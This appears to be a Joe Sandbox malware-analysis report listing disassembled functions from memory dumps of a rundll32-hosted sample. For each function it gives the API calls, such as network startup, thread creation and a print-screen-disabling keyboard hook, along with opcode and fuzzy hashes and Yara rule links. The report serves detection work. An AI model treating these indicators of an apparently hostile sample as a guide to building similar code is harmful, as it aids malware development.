Instruction ID: 3581c661d942ceb83f9ccc1086a434ca1af91bfe7792717dc079ca72a80f4cc2
Opcode Fuzzy Hash: b188500a3c1a0b6836b8d1b60a3ba4c009d566f15eabf9a274527e3b55d9f75c
Instruction Fuzzy Hash: A8315C71800A31AEFB11AF75AC88A793FB6EB59368710D62EE815D72B0DB31D442CF51

Function 04EE5B28 Relevance: 6.1, APIs: 4, Instructions: 105COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 04EE43F8: _memset.LIBCMT ref: 04EE4417
Part of subcall function 04EE43F8: _memset.LIBCMT ref: 04EE4431
Part of subcall function 04EE43F8: _memset.LIBCMT ref: 04EE447B

_memset.LIBCMT ref: 04EE5B6E
_strrchr.LIBCMT ref: 04EE5B93
_strtok.LIBCMT ref: 04EE5BA1
_strtok.LIBCMT ref: 04EE5C52

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: _memset$_strtok$_strrchr
String ID:
API String ID: 1565559595-0
Opcode ID: 7d8b75343decb582a6549e4d2e3b7885064fb2ddfcb991ca9c242b384ae37a01
Instruction ID: 0b160dbeac40c45e3b9162aeaef40079df82c75e0393d4b7f6ae3c0fa7f6d399
Opcode Fuzzy Hash: 7d8b75343decb582a6549e4d2e3b7885064fb2ddfcb991ca9c242b384ae37a01
Instruction Fuzzy Hash: E6312D71D04214ABFB21D7658C55FFB77A49F45709F0445D0EA45AB1C0EBB0BA848BA1

Function 04EBDF5C Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 04EBDF90
__isleadbyte_l.LIBCMT ref: 04EBDFC3
MultiByteToWideChar.KERNEL32(?,00000009,00000000,?,00000000,00000000,?,?,?,00000103,00000000,00000000), ref: 04EBDFF4
MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000001,00000000,00000000,?,?,?,00000103,00000000,00000000), ref: 04EBE062

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: afc24a13ba7713e0e9b49715ac06d88f8d8c5c974821e97ee5520ed25c17e160
Instruction ID: 05c68556774aae82d20385beb5853ee6488e636dd2cce6d211770268db225ed3
Opcode Fuzzy Hash: afc24a13ba7713e0e9b49715ac06d88f8d8c5c974821e97ee5520ed25c17e160
Instruction Fuzzy Hash: 3B31BD31A04246EFDB21DFA8CC84DFF7BB2AF01314F0895A8E4918B191E331E990DB91

Function 6D066697 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 6D064AF8: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6D0641B9,?,00000000,-00000008), ref: 6D064B59

GetLastError.KERNEL32 ref: 6D0666FB
__dosmaperr.LIBCMT ref: 6D066702
GetLastError.KERNEL32(?,?,?,?), ref: 6D06673C
__dosmaperr.LIBCMT ref: 6D066743

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: b331abaa26aeb0927d4f5842f6cd4bc33f5e664143730ee2bdba0e05b3b93bd5
Instruction ID: ac787d7d872bd414258c43c279d064a6349e1fd34d0c1b067aeb3f5c1fa5825a
Opcode Fuzzy Hash: b331abaa26aeb0927d4f5842f6cd4bc33f5e664143730ee2bdba0e05b3b93bd5
Instruction Fuzzy Hash: D021D371608296BFEB009F66D880B6AB7B9FF05364B81859DFA1997140DB30EC108BF0

Function 6D054E68 Relevance: 6.1, APIs: 4, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a356ee1e89bad6c13cf9da13403dc4a6603805719fe148ab2e406270f0d0239
Instruction ID: 37c4d9e86e3ba8249adf5587c214766756623e5d714131de594ba62e0e49d7ba
Opcode Fuzzy Hash: 3a356ee1e89bad6c13cf9da13403dc4a6603805719fe148ab2e406270f0d0239
Instruction Fuzzy Hash: 68216F3961C206BFFB109F6BCE44BAA77A9EF493687018514FE1497140E770EC7087A0

Function 6D067638 Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 6D067640

Part of subcall function 6D064AF8: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6D0641B9,?,00000000,-00000008), ref: 6D064B59

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6D067678
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6D067698

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: a4e256c92a882acff1bfb7e3edd03591efc1b46c806e4cc0085297c9bc7533ab
Instruction ID: e903d2297bff8408c0030af23c87bf287b7223a93e7b390bec8d911d35d46976
Opcode Fuzzy Hash: a4e256c92a882acff1bfb7e3edd03591efc1b46c806e4cc0085297c9bc7533ab
Instruction Fuzzy Hash: DE11EDF1A492567FFB12177A4C8CEAF69BCDE873983520128FA00E2500EBA5DD0082B4

Function 6CFFEEC0 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,6CFF9E6C,?,00000000,00000000,00000008,6CFF1FE0,00000000), ref: 6CFFEED3
__alldvrm.LIBCMT ref: 6CFFEEED
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CFFEF14
GetTickCount.KERNEL32 ref: 6CFFEF31

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: CountCounterPerformanceQueryTickUnothrow_t@std@@@__alldvrm__ehfuncinfo$??2@
String ID:
API String ID: 1296068966-0
Opcode ID: ebcaec619d1176244b613c3e750bb973f5ea5cb7627150aa257b0b48492eff31
Instruction ID: 142cc63c1bb37841dc1bffdb82d1fb72ead5661c64e4df8e50b05cf995b1c347
Opcode Fuzzy Hash: ebcaec619d1176244b613c3e750bb973f5ea5cb7627150aa257b0b48492eff31
Instruction Fuzzy Hash: 5F118C71508305EFDB449F68ED44B1AFBF8EB8A300F508629F218C6251E732A848DB55

Function 6D01A940 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 6D01A943
GetLastError.KERNEL32 ref: 6D01A9A5
SetLastError.KERNEL32(00000000), ref: 6D01A9B0

Strings

Unknown error %u (0x%08X), xrefs: 6D01A982

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: ErrorLast
String ID: Unknown error %u (0x%08X)
API String ID: 1452528299-1058733786
Opcode ID: ea230bea458f4dd26124594899263422b683925f93210ececd88439ed08a3fe9
Instruction ID: 6dc19f7f8cabf8c6435414fa0c3d2955a0fb0cb140ff14f1f13cd15ef3a03cf9
Opcode Fuzzy Hash: ea230bea458f4dd26124594899263422b683925f93210ececd88439ed08a3fe9
Instruction Fuzzy Hash: 8301B17150C206AFE7006FA59C44F6FBBECEF82269F220419F90597152E761984587B2

Function 04EC7460 Relevance: 6.1, APIs: 4, Instructions: 51networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 04EC74B1
InitializeCriticalSection.KERNEL32(?), ref: 04EC74BE
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 04EC74C9
__time64.LIBCMT ref: 04EC74EC

Part of subcall function 04EB27AA: GetSystemTimeAsFileTime.KERNEL32(04EC49EE,?,?,?,04EC49EE,?), ref: 04EB27B5
Part of subcall function 04EB27AA: __aulldiv.LIBCMT ref: 04EB27D5

Part of subcall function 04EB2777: __getptd.LIBCMT ref: 04EB277C

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: Time$CreateCriticalEventFileInitializeSectionStartupSystem__aulldiv__getptd__time64
String ID:
API String ID: 2538592855-0
Opcode ID: e2f87f3476f6211739eb1c79cebd885f95b84e17ea6e261edbfc40e53e564a4b
Instruction ID: 95c3ddccc1b3c2a836e7e35d082aa0d444f4c8ff535cfa7b2b072766d0957f0b
Opcode Fuzzy Hash: e2f87f3476f6211739eb1c79cebd885f95b84e17ea6e261edbfc40e53e564a4b
Instruction Fuzzy Hash: E811E6B0900B059FD3209F7AD985A97FBE8FF08305F404A6EA59E82641D734B9058F95

Function 6CFF5356 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6CFF5362
?SetDisablePrintScreen@@YAXH@Z.HKEYBOARD(?,00000000,?,?,?,?,?,6CFF5205,?,?,6CFF5280), ref: 6CFF5389
?SetDisablePrintScreen@@YAXH@Z.HKEYBOARD(00000001,?,00000000,?,?,?,?,?,6CFF5205,?,?,6CFF5280), ref: 6CFF53A3
std::_Lockit::~_Lockit.LIBCPMT ref: 6CFF53BE

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: DisableLockitPrintScreen@@std::_$Lockit::_Lockit::~_
String ID:
API String ID: 3731820245-0
Opcode ID: fd7679c92e03bfb822c6bc4ccf0b4a2fac386ce6ab9e43e72c37906ed0baf28a
Instruction ID: 65e89c0c02604f963c1efc27ac79f0fffa08dd4231a777c15f2c287aa730f686
Opcode Fuzzy Hash: fd7679c92e03bfb822c6bc4ccf0b4a2fac386ce6ab9e43e72c37906ed0baf28a
Instruction Fuzzy Hash: FB01B135A00619EFDB05DB59C884E9D7BB9EF85724B2440A9E8119B3B0DFB0EE45CB90

Function 04EDD280 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 04EDD2A6

Part of subcall function 04EDD0D2: __fltout2.LIBCMT ref: 04EDD0FD

__cftog_l.LIBCMT ref: 04EDD2CC
__cftoe_l.LIBCMT ref: 04EDD2FE

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction ID: fa3a59b6393a6b0400569d824b2023dcc40042c40aee3e76371ac1ea7eeb76eb
Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction Fuzzy Hash: AD114C3240014EBBDF265F84DC01CEE3F66BB59358B59A415FE1859030D236E6B2AB81

Function 04EBEB48 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 04EBEB6E

Part of subcall function 04EBE99A: __fltout2.LIBCMT ref: 04EBE9C5

__cftog_l.LIBCMT ref: 04EBEB94
__cftoe_l.LIBCMT ref: 04EBEBC6

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction ID: 32d3dc77a8cbf064bc44ec169d9c30422e597aee78b49983ac53954a3ee4a0f6
Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction Fuzzy Hash: 6C114C3604014AFBCF265F98CC81CEE3F66BB18358B489955FE9959130D336E9B1AB81

Function 04ED9DBF Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 04ED9DCB

Part of subcall function 04ED3A90: __getptd_noexit.LIBCMT ref: 04ED3A93
Part of subcall function 04ED3A90: __amsg_exit.LIBCMT ref: 04ED3AA0

__amsg_exit.LIBCMT ref: 04ED9DEB
__lock.LIBCMT ref: 04ED9DFB
_free.LIBCMT ref: 04ED9E2B

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: __amsg_exit$__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3170801528-0
Opcode ID: 81631af5cdc54498fe778bca56b1344b950f0aced79e833b94f8be01018399a1
Instruction ID: 99b3cfcdcd01a2b4cbaabd7edb963b27e885b9139ba2b5430b3269ab0c805cdc
Opcode Fuzzy Hash: 81631af5cdc54498fe778bca56b1344b950f0aced79e833b94f8be01018399a1
Instruction Fuzzy Hash: 21018075D01771EBEB21AF688C8579EB7A0BF04718F046519EC05A7291CB34B943CBD1

Function 04ED1EA6 Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 04ED1EC0

Part of subcall function 04ED2C06: __FF_MSGBANNER.LIBCMT ref: 04ED2C1F
Part of subcall function 04ED2C06: __NMSG_WRITE.LIBCMT ref: 04ED2C26

std::exception::exception.LIBCMT ref: 04ED1EF5
std::exception::exception.LIBCMT ref: 04ED1F0F
__CxxThrowException@8.LIBCMT ref: 04ED1F20

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: std::exception::exception$Exception@8Throw_malloc
String ID:
API String ID: 2388904642-0
Opcode ID: f51ddbd8e2a9470a2d3d1d33b4ea24292f5693e40e108262bbab9c00d36db973
Instruction ID: a25d134f580bd5fa0c129ffef99ab1171effefeefef8da85d7468f7eeb158062
Opcode Fuzzy Hash: f51ddbd8e2a9470a2d3d1d33b4ea24292f5693e40e108262bbab9c00d36db973
Instruction Fuzzy Hash: 6FF0F4749002196AEF14EB94CC44AAEBBB9FF4020CF40155DED05AA090CB75FB438752

Function 6D066034 Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,?,?,00000000,6D066193,00000000,?,6D06C7D2,6D066193,6D066193,?,?,00000000,00000104,?,00000001), ref: 6D06604A
GetLastError.KERNEL32(?,6D06C7D2,6D066193,6D066193,?,?,00000000,00000104,?,00000001,00000000,00000000,?,6D066193,?,00000104), ref: 6D066054
__dosmaperr.LIBCMT ref: 6D06605B
GetFullPathNameW.KERNEL32(?,?,?,00000000,?,?,6D06C7D2,6D066193,6D066193,?,?,00000000,00000104,?,00000001,00000000), ref: 6D066085

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: FullNamePath$ErrorLast__dosmaperr
String ID:
API String ID: 1391015842-0
Opcode ID: 47ca522f6425275d734f9d891aeccb2174a88b0096a38b5ee6c2996d4724c212
Instruction ID: 9d70057b6ba1e4741ca69d906497d991e1945d19f3a5e8ff7e89097f4a4e8797
Opcode Fuzzy Hash: 47ca522f6425275d734f9d891aeccb2174a88b0096a38b5ee6c2996d4724c212
Instruction Fuzzy Hash: FAF03176204251AFFB205F76C804F6BBBFAEF463607508969E659D7010DB72E4208BA0

Function 6D06609A Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,?,?,00000000,6D066193,00000000,?,6D06C844,6D066193,?,?,00000000,00000104,?,00000001,00000000), ref: 6D0660B0
GetLastError.KERNEL32(?,6D06C844,6D066193,?,?,00000000,00000104,?,00000001,00000000,00000000,?,6D066193,?,00000104,?), ref: 6D0660BA
__dosmaperr.LIBCMT ref: 6D0660C1
GetFullPathNameW.KERNEL32(?,?,?,00000000,?,?,6D06C844,6D066193,?,?,00000000,00000104,?,00000001,00000000,00000000), ref: 6D0660EB

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: FullNamePath$ErrorLast__dosmaperr
String ID:
API String ID: 1391015842-0
Opcode ID: 84c76b9ccb483f05389bea00b31f894dac2ae535ca1e833972c18f1915ebd23d
Instruction ID: 9516e8d57a1b96e380dbd5990dc791740410461efd01b35c98339a0ed2377a85
Opcode Fuzzy Hash: 84c76b9ccb483f05389bea00b31f894dac2ae535ca1e833972c18f1915ebd23d
Instruction Fuzzy Hash: 5AF03136304211AFFB215F66C804F5B7BF9EF463647518839EA5AD7110DB72E4208BA0

Function 04EC3720 Relevance: 6.0, APIs: 4, Instructions: 34synchronizationthreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 04EC3738
CreateThread.KERNEL32(00000000,00000000,Function_00013690,?,00000000,00000000), ref: 04EC3752
WaitForSingleObject.KERNEL32(?,000000FF), ref: 04EC3760
CloseHandle.KERNEL32(?), ref: 04EC376A

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: Create$CloseEventHandleObjectSingleThreadWait
String ID:
API String ID: 3360349984-0
Opcode ID: f4641e9a4e113cab7239f76a23a7d373c5850bb57eeac6fba91034e70fad5df0
Instruction ID: 132568387c69c9279ff09151af7b9be7a234971a79679f5c0eb0568dfb5f5714
Opcode Fuzzy Hash: f4641e9a4e113cab7239f76a23a7d373c5850bb57eeac6fba91034e70fad5df0
Instruction Fuzzy Hash: 55F0B4B5E44318BBD710DBA4DC4AF9E7B74EB04B11F2042A5FA14A73C1D6B46A008BD8

Function 04EC5A10 Relevance: 6.0, APIs: 4, Instructions: 34COMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 04EC5A2A
_memset.LIBCMT ref: 04EC5A48
_strncpy.LIBCMT ref: 04EC5A57
GetTickCount.KERNEL32 ref: 04EC5A72

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: CountCreateEventTick_memset_strncpy
String ID:
API String ID: 2595203753-0
Opcode ID: dd5329d3e76c7d352649f199324fc852b23b64afd7c7f978a0298d42d10715e0
Instruction ID: 8c6c5f27111052adc23bc384c8c1217eec02825721f17993d702940eb0c0a464
Opcode Fuzzy Hash: dd5329d3e76c7d352649f199324fc852b23b64afd7c7f978a0298d42d10715e0
Instruction Fuzzy Hash: 4AF0AFB0640B01AFE330DF51D946B43BBE8EF04B00F00892EEA898B681E3B0B045CB95

Function 6D06CDB9 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,6D0642E9,00000000,00000000,00000000,?,6D067E82,00000000,00000001,00000000,?,?,6D05E9E1,?,00000000,00000000), ref: 6D06CDD0
GetLastError.KERNEL32(?,6D067E82,00000000,00000001,00000000,?,?,6D05E9E1,?,00000000,00000000,?,?,?,6D05EFBB,?), ref: 6D06CDDC

Part of subcall function 6D06CDA2: CloseHandle.KERNEL32(FFFFFFFE,6D06CDEC,?,6D067E82,00000000,00000001,00000000,?,?,6D05E9E1,?,00000000,00000000,?,?), ref: 6D06CDB2

___initconout.LIBCMT ref: 6D06CDEC

Part of subcall function 6D06CD64: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6D06CD93,6D067E6F,?,?,6D05E9E1,?,00000000,00000000,?), ref: 6D06CD77

WriteConsoleW.KERNEL32(00000000,6D0642E9,00000000,00000000,?,6D067E82,00000000,00000001,00000000,?,?,6D05E9E1,?,00000000,00000000,?), ref: 6D06CE01

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 88c4ba27c8615083f912be8b4344a25e46fc37b47dd0ac2ba5f6ff0b24665f6c
Instruction ID: 74a3d166825a90ad87257dace9c86aea982e679827cc3d06b8303da5817042d1
Opcode Fuzzy Hash: 88c4ba27c8615083f912be8b4344a25e46fc37b47dd0ac2ba5f6ff0b24665f6c
